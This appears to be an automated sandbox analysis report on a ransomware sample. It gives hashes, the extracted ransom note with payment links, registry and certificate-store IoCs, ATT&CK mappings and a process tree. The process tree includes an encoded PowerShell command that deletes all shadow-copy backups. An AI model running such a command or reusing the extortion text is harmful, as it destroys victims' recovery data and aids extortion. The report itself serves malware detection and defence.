9d3a482d9441876096e0cee429fedf7b9f7e1c6a50b3e4b2009884019627d879

Analysis

max time kernel
146s
max time network
150s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
21-05-2024 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Size

166KB
MD5

63ae6ca6853552716571555546833d99
SHA1

09e37e98a74ec8edb36b22a4eb51dbed4390544a
SHA256

9d3a482d9441876096e0cee429fedf7b9f7e1c6a50b3e4b2009884019627d879
SHA512

087baf5fbf764f480f384cbdee878d3dfb8b3880f378b4597d5e292f392341e5da196ee2232a441c6268b7760afffdde293f35f536ee55cff4992b4b45238f86
SSDEEP

1536:EOYMGzUt2Z+tRvSKGNkR87Kk9VWvDtwVQKeDZz0TDsTR6wss+oJ27b5EIBNUup7E:EJMawtnGqtWoKeZC62aoNUSncZUw+S3

Score

10^/10

persistence ransomware

Malware Config

Extracted

Path

C:\Users\readme-j008b4a42n-NOW.txt

Ransom Note

Your files are locked due to a vulnerability in your system by "j008b4a42n" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/71639715C427C907 If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71639715C427C907 After going to the site, enter the following code: idmdCliYdIk8qzMNaIAyUig7awNVXJ7Wp8u3mXxdums80evXBfM8NISECrZCyt8t NjGj6JPSGX3HHGp9zMPmmcusMdIyL1+XkMGBsBwQR9SAD1oAqN9Eg1Fy42PDmCzu j6YFwhm6IxkZnRo+WoU6YnG3rD9NV5QxPQyDBHQXAqvTiHuw6mQR+Gr1kWJP/VzB bdLsp5djmA8RVLap/oh63Xb0LfZYH0jSHGnEH9dTgpcZg9v2oG+t+bglmM8Ct0WL lR/oq4MxLkqBlTDo8Nqz++tBAp3tKKBnBt4Tf7HPeqs0p+3J22jD1e2ZCk+sK/RL D3HrhTJBCAjn7tSkl7jZeZzrjP306oZe58+qP2s4Q9Ld2bygsTGqHE4Tz8dDVI+V 3FmkJUJ9PB9NnGzoK5HFY6pUKv7p/CYtQ1wbst+Y6EOCIzQfnuGXH8ECUWu1srhC abVx9KG9TDqeB2v8wQmM1aOa+Q1w7j5/x6UpTDorsYCWjJLDRfX8/8GuU1RkQtRr cek9WoYi3C8cLgLi8JmTMnTh1vh4/b84TnwEwrBvcTh0IZvd4vF2RvHCI4ywgeu1 jXeDhGDisjlft/MhMv7GD4ZhmcojX9+2EBZqRpxuaApsftS4bNGDf0zO8SfKJJQt 4XEtaL9ufgmKHM/Pa6/eEMS7y8mM2B7ucvdtWybZcrvTtCogYyZxf9QsSOTSfSFf DuCiHVxvGvP/lnm7JSNew0c9Anj+E7RRGDq/k2475379kyh3tFMNyty5oUujK+7D ndptqaSynNfD6o5ATtVVQ3TrLmz2884lBe7raEj+RjuwI4y9HxDERGafDevMYOhE DbiistXgwNSkJ4sAO3DEE7hqnglywOMm/+h/2hGATbtUH7LTUfp2p8oJmF5OVxvJ RjJDLDEFfs6WALEiD/4L4YhGPhNycwYagz+oqFj7kpLfduWpha4ddce2aqk81a8/ /vK+3cwvB81HFn9tqTV//6ZoRnYHfFcWoqtmzZwfsUhbVmuY2AHJRyb+dtBRT4sc XEIjc5z26AzhRBh2gH+nAmxYRZvIOEvezCA7mIaOIX9dCzgUQ5lDpTNzTCVGCWgz 4yiJx7WCR8gC6mAEZqiCJLKms0L4W6zgabksK9Ifq/jeuKS9tYIAWvpI9QAyRfbW WOPXaqMg7AIB3Q8vWGLMggiqwwLJJkcNjIx7o2xWOUks6nM9lY9yd+bzG933s6xm jcvFxMbmWFvymi23Oaldy0QgE+ZI0OfTkgVv4jTfI2ay1+nmp13soGBckBNyKAOd lzOL5fzYWcBj4kxARNkImkEeVhXRTw8H9/lEr98dGjN8J/IqA2GYA7lGWpmcymj4 hYxoJyEJu3fZoRhlg5hdFOEE4mDZpOmcCPnJaSE/6MtkTv8GaJgiuQ==

URLs

http://decryptor.cc/71639715C427C907

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71639715C427C907

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oXnEn2JlQT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\63ae6ca6853552716571555546833d99_JaffaCakes118.exe"	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\A:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\Z:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\F:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\R:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\S:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\W:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\B:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\E:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\J:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\H:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\L:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\N:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\T:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\U:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\Y:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\D:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\K:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\M:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\V:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\Q:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\X:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\G:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\O:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened (read-only)	\??\P:	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6pbp7364q9.bmp"	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Drops file in Program Files directory 36 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\AddPing.png	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SplitEnter.scf	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\readme-j008b4a42n-NOW.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File created	\??\c:\program files (x86)\readme-j008b4a42n-NOW.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ClearConvertFrom.avi	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\MeasureUse.wpl	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ResolveWait.contact	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SubmitBackup.ttf	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\readme-j008b4a42n-NOW.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DebugRequest.dib	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UseSelect.potm	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CloseHide.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RequestPublish.easmx	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\StartComplete.png	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SyncSave.tmp	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UnblockRegister.DVR	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\WatchRepair.docm	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UnregisterMerge.dotm	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File created	\??\c:\program files\readme-j008b4a42n-NOW.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CompareComplete.mpeg3	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ConnectGet.pot	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DisconnectDisable.doc	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\EnterRestore.mhtml	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SetCheckpoint.ogg	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\InitializeGet.wmx	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\MeasureRequest.contact	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UninstallDebug.vstm	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UnprotectCopy.tmp	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UnpublishWrite.contact	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ApproveCompare.ods	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\GroupRevoke.zip	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\NewExport.mhtml	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ProtectBlock.mhtml	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\readme-j008b4a42n-NOW.txt	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\CloseGet.mov	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SplitClear.bmp	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\SystemCertificates\CA\Certificates\A053375BFE84E8B748782C7CEE15827A6AF5A405	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\SystemCertificates\CA\Certificates\A053375BFE84E8B748782C7CEE15827A6AF5A405\Blob = 030000000100000014000000a053375bfe84e8b748782c7cee15827a6af5a405140000000100000014000000142eb317b75856cbae500940e61faf9d8b14c2c6040000000100000010000000e829e65d7c4307d6fbc13c179e037a360f0000000100000020000000444ebd67bb83f8807b3921e938ac9178b882bd50aadb11231f044cf5f08df7ce190000000100000010000000f044424c506513d62804c04f719403f91800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000001a05000030820516308202fea003020102021100912b084acf0c18a753f6d62e25a75f5a300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a3032310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310b300906035504031302523330820122300d06092a864886f70d01010105000382010f003082010a0282010100bb021528ccf6a094d30f12ec8d5592c3f882f199a67a4288a75d26aab52bb9c54cb1af8e6bf975c8a3d70f4794145535578c9ea8a23919f5823c42a94e6ef53bc32edb8dc0b05cf35938e7edcf69f05a0b1bbec094242587fa3771b313e71cace19befdbe43b45524596a9c153ce34c852eeb5aeed8fde6070e2a554abb66d0e97a540346b2bd3bc66eb66347cfa6b8b8f572999f830175dba726ffb81c5add286583d17c7e709bbf12bf786dcc1da715dd446e3ccad25c188bc60677566b3f118f7a25ce653ff3a88b647a5ff1318ea9809773f9d53f9cf01e5f5a6701714af63a4ff99b3939ddc53a706fe48851da169ae2575bb13cc5203f5ed51a18bdb150203010001a382010830820104300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e04160414142eb317b75856cbae500940e61faf9d8b14c2c6301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b0500038202010085ca4e473ea3f7854485bcd56778b29863ad754d1e963d336572542d81a0eac3edf820bf5fccb77000b76e3bf65e94dee4209fa6ef8bb203e7a2b5163c91ceb4ed3902e77c258a47e6656e3f46f4d9f0ce942bee54ce12bc8c274bb8c1982fa2afcd71914a08b7c8b8237b042d08f908573e83d904330a472178098227c32ac89bb9ce5cf264c8c0be79c04f8e6d440c5e92bb2ef78b10e1e81d4429db5920ed63b921f81226949357a01d6504c10a22ae100d4397a1181f7ee0e08637b55ab1bd30bf876e2b2aff214e1b05c3f51897f05eacc3a5b86af02ebc3b33b9ee4bdeccfce4af840b863fc0554336f668e136176a8e99d1ffa540a734b7c0d063393539756ef2ba76c89302e9a94b6c17ce0c02d9bd81fb9fb768d40665b3823d7753f88e7903ad0a3107752a43d8559772c4290ef7c45d4ec8ae468430d7f2855f18a179bbe75e708b07e18693c3b98fdc6171252aafdfed255052688b92dce5d6b5e3da7dd0876c842131ae82f5fbb9abc889173de14ce5380ef6bd2bbd968114ebd5db3d20a77e59d3e2f858f95bb848cdfe5c4f1629fe1e5523afc811b08dea7c9390172ffdaca20947463ff0e9b0b7ff284d6832d6675e1e69a393b8f59d8b2f0bd25243a66f3257654d3281df3853855d7e5d6629eab8dde495b5cdb5561242cdc44ec6253844506decce005518fee94964d44eca979cb45bc073a8abb847c2	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 4300000001000000000000000400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
2736	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeBackupPrivilege	2564	vssvc.exe
Token: SeRestorePrivilege	2564	vssvc.exe
Token: SeAuditPrivilege	2564	vssvc.exe
Token: SeTakeOwnershipPrivilege	1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 2736	1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe	28
PID 1652 wrote to memory of 2736	1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe	28
PID 1652 wrote to memory of 2736	1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe	28
PID 1652 wrote to memory of 2736	1652	63ae6ca6853552716571555546833d99_JaffaCakes118.exe	28

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\63ae6ca6853552716571555546833d99_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\63ae6ca6853552716571555546833d99_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2736

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3064

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

